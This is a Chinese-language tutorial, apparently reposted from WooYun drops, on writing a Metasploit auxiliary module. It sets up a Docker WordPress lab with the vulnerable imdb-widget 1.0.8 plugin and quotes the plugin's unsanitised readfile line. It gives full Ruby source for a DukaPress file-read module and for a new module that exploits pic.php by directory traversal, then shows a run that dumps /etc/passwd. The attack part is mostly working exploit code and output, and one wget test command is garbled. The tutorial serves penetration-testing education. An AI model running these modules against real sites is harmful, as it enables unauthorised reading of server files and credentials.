
Metasploit module开发入门篇

0x00 概述

Metasploit——渗透测试神器,相信大家应该都用过或听过,drops里也有很多白帽子写过相关的文章,介绍如何使用Metasploit。使用过Metasploit的同学应该知道,Metasploit Framework是高度模块化的,即框架是由多个module组成,我们除了可以使用已有的 module,还可以自行编写module来满足自己的需求,模块化使得框架具有很好的可扩展性,这也是为什么Metasploit Framework这么受欢迎的原因之一。

看了看drops之前的文章,好像没人写过关于如何编写 Metasploit Module,刚好最近在捣鼓Metasploit,顺便复习下快遗忘的ruby,记录下自己学习的过程。

因为是入门篇,所以这里以一个非常简单WordPress Plugin的任意文件读取漏洞作为例子,搭建环境,编写自己的Auxiliary module(辅助模块),然后测试验证,介绍编写自己的 module的步骤和方法。


0x01 漏洞环境

漏洞环境是一个WordPress 插件 imdb-widget 1.0.8版本的任意文件读取漏洞,缺陷代码存在于pic.php,代码:

<?php header( 'Content-Type: image/jpeg' ); readfile( $_GET["url"] ); 



因为 Content-Type 被设置成了 image/jpeg,所以访问后需要点击另存为文本文件,然后打开就可以获取到文件内容

可以参考 Wordpress Plugin IMDb Profile Widget 1.0.8 - Local File Inclusion

0x02 环境搭建



这里使用 Kali 2.0,自带Metasploit,比较方便,下载 Prebuilt Kali Linux VirtualBox Images ,导入VirtualBox就可以用,这里就不细说了

WordPress 插件漏洞环境

这里使用docker来搭建,操作系统为 Ubuntu 14.04,docker的安装大家可以 google下

拉取 WordPress image

docker pull wordpress:4.4.2 

拉取 Mysql image

docker pull mysql:5.7.11 

拉取过程可能会比较慢,可以装个Shadow(socks)和proxychains,再proxychains docker pull

启动 mysql container

docker run -d -p 3306:3306 --name mysql -e MYSQL_ROOT_PASSWORD=root mysql:5.7.11 

启动 wordpress container

docker run -d --name wordpress --link mysql:mysql -p 80:80 wordpress:4.4.2 




下载插件imdb-widget有漏洞的 1.0.8版本 ,点击左边导航栏的 插件 - 安装插件 - 上传插件,选择刚才下载的zip包,点现在安装 - 启用插件

然后点击 外观 - 小工具,把左边的 IMDb Profile 拖到 挂件区域的第一个位置,点开设置User id,随便填一个如 ur1 ,Show 随便勾选几个,点保存。主页刷新就可以看到了

Metasploit module开发入门篇

测试漏洞,执行如下命令,就可以看到 /etc/passwd 的内容

wget -O result.txt  cat result.txt ... 

0x03 编写Module


Metasploit中的 Module Tree 分为两种, Primary Module TreeUser-Specified Module Tree ,前者用于放框架自带的module,后者用于放自己写的module.

Primary Module Tree在目录 /usr/share/metasploit-framework/modules/

User-Specified Module Tree 在 ~/.msf7/modules/ (官网写的是~/.msf4/modules/)


drwxr-xr-x 20 root root 4.0K Jan 28 05:38 auxiliary drwxr-xr-x 11 root root 4.0K Jan 28 05:38 encoders drwxr-xr-x 18 root root 4.0K Jan 28 05:38 exploits drwxr-xr-x  9 root root 4.0K Jan 28 05:38 nops drwxr-xr-x  5 root root 4.0K Jan 28 05:38 payloads drwxr-xr-x 11 root root 4.0K Jan 28 05:38 post 


auxiliary :辅助模块,不带有payload的exploit,比如一些扫描模块

payloads :远程运行的代码,比如反弹shell的代码

exploits :带有payload的exploit

encoders :用于对payload进行编码

nops :保持paload大小的一致性

post : 获取权限后,用于后续渗透阶段的模块

因为任意读取漏洞是用于获取信息的,并不能直接获取系统权限,即不带有 payload ,因此我们要编写的module是属于auxiliary分类下的。

编写之前,我们来分析下任意文件读取漏洞auxiliary module需要完成的功能,简单来说:

  1. 检查插件版本,看是否为存在漏洞的版本,如果不是,则返回invulnerable,如果是或不确定,比如获取不到版本信息,则执行2
  2. 向存在漏洞的页面发送http请求,获取某个指定文件的内容,如果获取成功,则保存文件到本地。如果获取失败,有两种可能性,一是插件不存在漏洞,对应前面获取不到版本信息的情况;二是文件不存在或文件的权限问题;需要根据返回做相应处理



  1. 找一个auxiliary module的代码skeleton,然后一点点自己写;
  2. 找一个类似的已经写好的module,在它的基础上改写;


打开 msfconsole ,因为是文件读取,可以先search wordpress然后再找 read 关键词,在 msfconsole 中执行

msf > grep "read" search wordpress 


auxiliary/scanner/http/wp_dukapress_file_read                                   normal     WordPress DukaPress Plugin File Read Vulnerability  auxiliary/scanner/http/wp_gimedia_library_file_read                             normal     WordPress GI-Media Library Plugin Directory Traversal Vulnerability  auxiliary/scanner/http/wp_imdb_profile_widget_file_read                         normal     WordPress IMDb Profile Widget Plugin File Read Vulnerability  auxiliary/scanner/http/wp_mobileedition_file_read                               normal     WordPress Mobile Edition File Read Vulnerability  auxiliary/scanner/http/wp_nextgen_galley_file_read                              normal     WordPress NextGEN Gallery Directory Read Vulnerability  auxiliary/scanner/http/wp_simple_backup_file_read                               normal     WordPress Simple Backup File Read Vulnerability  auxiliary/scanner/http/wp_subscribe_comments_file_read                          normal     WordPress Subscribe Comments File Read Vulnerability 

这里选择 auxiliary/scanner/http/wp_dukapress_file_read ,具体文件位于 /usr/share/metasploit-framework/modules/auxiliary/scanner/http/wp_dukapress_file_read.rb


require 'msf/core'  class Metasploit3 < Msf::Auxiliary    include Msf::Auxiliary::Report    include Msf::Exploit::Remote::HTTP::Wordpress    include Msf::Auxiliary::Scanner    def initialize(info = {})      super(update_info(info,       'Name'           => 'WordPress DukaPress Plugin File Read Vulnerability',       'Description'    => %q{         This module exploits a directory traversal vulnerability in WordPress Plugin         "DukaPress" version 2.5.2, allowing to read arbitrary files with the         web server privileges.       },       'References'     =>         [           ['EDB', '35346'],           ['CVE', '2014-8799'],           ['WPVDB', '7731'],           ['OSVDB', '115130']         ],       'Author'         =>         [           'Kacper Szurek', # Vulnerability discovery           'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module         ],       'License'        => MSF_LICENSE     ))      register_options(       [         OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),         OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])       ], self.class)    end    def check      check_plugin_version_from_readme('dukapress', '2.5.7')    end    def run_host(ip)      traversal = "../" * datastore['DEPTH']     filename = datastore['FILEPATH']     filename = filename[1, filename.length] if filename =~ /^///      res = send_request_cgi({       'method' => 'GET',       'uri'    => normalize_uri(wordpress_url_plugins, 'dukapress', 'lib', 'dp_image.php'),       'vars_get' =>         {           'src' => "#{traversal}#{filename}"         }     })      if res && res.code == 200 && res.body.length > 0        print_status('Downloading file...')       print_line("/n#{res.body}")        fname = datastore['FILEPATH']        path = store_loot(         'dukapress.file',         'text/plain',         ip,         res.body,         fname       )        print_good("#{peer} - File saved in: #{path}")     else       print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")     end    end  end 

看到这一堆代码,一般人都会有点晕,不知道从那里下手,莫慌,问google,搜索 metasploit write module ,搜索结果第三个, How to get started with writing an exploit ,里面有一些module结构的说明. 这里对照着给了代码加了些注释:

# 引入msf core 库  require 'msf/core'  # 继承 Msf::Auxiliary 类  class Metasploit3 < Msf::Auxiliary    # 引入三个 module,具体可以查看文档    include Msf::Auxiliary::Report    include Msf::Exploit::Remote::HTTP::Wordpress    include Msf::Auxiliary::Scanner    # 初始化函数    def initialize(info = {})      super(update_info(info,       # [Vendor] [Software] [Root Cause] [Vulnerability type]        'Name'           => 'WordPress DukaPress Plugin File Read Vulnerability',       # 描述       'Description'    => %q{         This module exploits a directory traversal vulnerability in WordPress Plugin         "DukaPress" version 2.5.2, allowing to read arbitrary files with the         web server privileges.       },       # 相关vulnerability 或 exploit的参考       'References'     =>         [           ['EDB', '35346'],           ['CVE', '2014-8799'],           ['WPVDB', '7731'],           ['OSVDB', '115130']         ],       # 作者       'Author'         =>         [           'Kacper Szurek', # Vulnerability discovery           'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit module         ],       'License'        => MSF_LICENSE     ))     # 注册需要参数     register_options(       [         # 要获取的文件路径         OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),         # 遍历深度,用于到达根目录,默认7次../         OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])       ], self.class)    end    # 用于支持 check 命令;在具体执行exploit前,检查是否存在漏洞    def check      # 检查dukapress版本,Wordpress module提供     check_plugin_version_from_readme('dukapress', '2.5.7')    end    def run_host(ip)      traversal = "../" * datastore['DEPTH']     filename = datastore['FILEPATH']     filename = filename[1, filename.length] if filename =~ /^///     # 发送http请求     res = send_request_cgi({       'method' => 'GET',       'uri'    => normalize_uri(wordpress_url_plugins, 'dukapress', 'lib', 'dp_image.php'),       'vars_get' =>         {           'src' => "#{traversal}#{filename}"         }     })     # 检查响应     if res && res.code == 200 && res.body.length > 0        print_status('Downloading file...')       print_line("/n#{res.body}")        fname = datastore['FILEPATH']       # 保存文件       path = store_loot(         'dukapress.file',         'text/plain',         ip,         res.body,         fname       )        print_good("#{peer} - File saved in: #{path}")     else       print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")     end    end  end 


#  This module requires Metasploit: http://metasploit.com/download  Current source: https://github.com/rapid7/metasploit-framework  #  # 引入msf core 库  require 'msf/core'  # 继承 Msf::Auxiliary 类  class Metasploit3 < Msf::Auxiliary    # 引入三个 module,照搬,具体可以查看文档    include Msf::Auxiliary::Report    include Msf::Exploit::Remote::HTTP::Wordpress    include Msf::Auxiliary::Scanner    # 初始化函数    def initialize(info = {})      super(update_info(info,       # [Vendor] [Software] [Root Cause] [Vulnerability type]        'Name'           => 'WordPress IMDb Profile Widget Plugin File Read Vulnerability',       # 描述       'Description'    => %q{         This module exploits a directory traversal vulnerability in WordPress Plugin         "IMDb Profile Widget" version 1.0.8, allowing to read arbitrary files with the         web server privileges.       },       # 相关vulnerability 或 exploit的参考       'References'     =>         [           ['URL', 'https://www.exploit-db.com/exploits/39621/']         ],       # 作者       'Author'         =>         [           'CrashBandicot @DosPerl', # Vulnerability discovery           'blinking.yan <blinking.yan[at]gmail.com>' # Metasploit module         ],       'License'        => MSF_LICENSE     ))     # 注册需要参数     register_options(       [         OptString.new('FILEPATH', [true, 'The path to the file to read', '/etc/passwd']),         OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])       ], self.class)    end    # 用于支持 check 命令;在具体执行exploit前,检查是否存在漏洞    def check      # 检查imdb-widget版本     check_plugin_version_from_readme('imdb-widget', '1.0.8')    end    # 执行exploit    def run_host(ip)      traversal = "../" * datastore['DEPTH']     filename = datastore['FILEPATH']     filename = filename[1, filename.length] if filename =~ /^///     # 发送读取文件的http请求     res = send_request_cgi({       'method' => 'GET',       'uri'    => normalize_uri(wordpress_url_plugins, 'imdb-widget', 'pic.php'),       'vars_get' =>         {           'url' => "#{traversal}#{filename}"         }     })     # 检查响应     if res && res.code == 200 && res.body.length > 0       # 文件不存在       if res.body.include? 'No such file or directory'          print_error("#{peer} - Nothing was downloaded. No such file or directory: /#{filename}. Please change the DEPTH parameter.")       # 文件读取权限问题       elsif res.body.include? 'Permission denied'         print_error("#{peer} - Nothing was downloaded. Permission denied: /#{filename}. Please change the DEPTH parameter.")       else         print_status('Downloading file...')         print_line("/n#{res.body}")          fname = datastore['FILEPATH']         # 保存文件         path = store_loot(           'imdb-widget.file',           'text/plain',           ip,           res.body,           fname         )          print_good("#{peer} - File saved in: #{path}")       end     else       print_error("#{peer} - Nothing was downloaded. You can try to change the DEPTH parameter.")     end    end  end 



代码中发送http请求部分可以参考: How to Send an HTTP Request Using HTTPClient

0x04 测试Module

前面提到,msf有专门的目录 ~/.msf7/modules/ 来存放自己编写的module,这里对照着 auxiliary/scanner/http/wp_dukapress_file_read ,创建目录

mkdir -p  ~/.msf7/modules/auxiliary/scanner/http/ 

将代码保存 ~/.msf7/modules/auxiliary/scanner/http/ 目录下,文件名为 wp_imdb_profile_widget_file_read.rb ,重启msfconsole,加载自定义module,执行

msfconsole -m ~/.msf7/modules 


msf > grep "imdb" search wordpress  auxiliary/scanner/http/wp_imdb_profile_widget_file_read                         normal     WordPress IMDb Profile Widget Plugin File Read Vulnerability 


msf > use auxiliary/scanner/http/wp_imdb_profile_widget_file_read  msf auxiliary(wp_imdb_profile_widget_file_read) > show options   Module options (auxiliary/scanner/http/wp_imdb_profile_widget_file_read):     Name       Current Setting  Required  Description  ---     DEPTH      7                yes       Traversal Depth (to reach the root folder)     FILEPATH   /etc/passwd      yes       The path to the file to read     Proxies                     no        A proxy chain of format type:host:port,type:host:port     RHOSTS                      yes       The target address range or CIDR identifier     RPORT      80               yes       The target port     TARGETURI  /                yes       The base path to the wordpress application     THREADS    1                yes       The number of concurrent threads     VHOST                       no        HTTP server virtual host  msf auxiliary(wp_imdb_profile_widget_file_read) > set rhosts  rhosts =>  msf auxiliary(wp_imdb_profile_widget_file_read) > run  [*] Downloading file...  root:x:0:0:root:/root:/bin/bash  daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin  bin:x:2:2:bin:/bin:/usr/sbin/nologin  sys:x:3:3:sys:/dev:/usr/sbin/nologin  sync:x:4:65534:sync:/bin:/bin/sync  games:x:5:60:games:/usr/games:/usr/sbin/nologin  man:x:6:12:man:/var/cache/man:/usr/sbin/nologin  lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin  mail:x:8:8:mail:/var/mail:/usr/sbin/nologin  news:x:9:9:news:/var/spool/news:/usr/sbin/nologin  uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin  proxy:x:13:13:proxy:/bin:/usr/sbin/nologin  www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin  backup:x:34:34:backup:/var/backups:/usr/sbin/nologin  list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin  irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin  gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin  nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin  systemd-timesync:x:100:103:systemd Time Synchronization,,,:/run/systemd:/bin/false  systemd-network:x:101:104:systemd Network Management,,,:/run/systemd/netif:/bin/false  systemd-resolve:x:102:105:systemd Resolver,,,:/run/systemd/resolve:/bin/false  systemd-bus-proxy:x:103:106:systemd Bus Proxy,,,:/run/systemd:/bin/false  [+] - File saved in: /root/.msf7/loot/20160403132842default192.168.1.191imdbwidget.file266865.txt  [*] Scanned 1 of 1 hosts (100% complete)  [*] Auxiliary module execution completed  msf auxiliary(wp_imdb_profile_widget_file_read) >  


0x05 结论

文章主要介绍的是如何去编写module的方法,有的地方可能写的不是很详细。总结来说就是: 在接触一个新的东西时,参考别人已经写好的东西,然后修修改改,是一种很好快速入门的方法。

原文  http://drops.wooyun.org/tips/14408